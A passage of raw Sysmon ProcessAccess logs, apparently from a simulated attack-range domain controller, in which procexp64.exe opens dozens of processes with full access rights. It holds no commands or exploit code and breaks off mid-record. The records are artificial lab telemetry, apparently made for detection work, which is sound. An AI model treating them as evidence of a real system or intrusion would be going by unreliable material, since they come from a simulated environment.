15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3263-6010-DAA2-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791176Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791175Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791174Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791173Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791172Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791171Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791170Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791169Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791168Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791167Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791166Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791165Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791164Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791163Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791162Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791161Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791160Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791159Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791158Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791157Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791156Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791155Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791154Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791153Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791152Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791151Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791150Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791149Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791148Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791147Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791146Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791145Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791144Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791143Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791142Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791141Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791140Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program 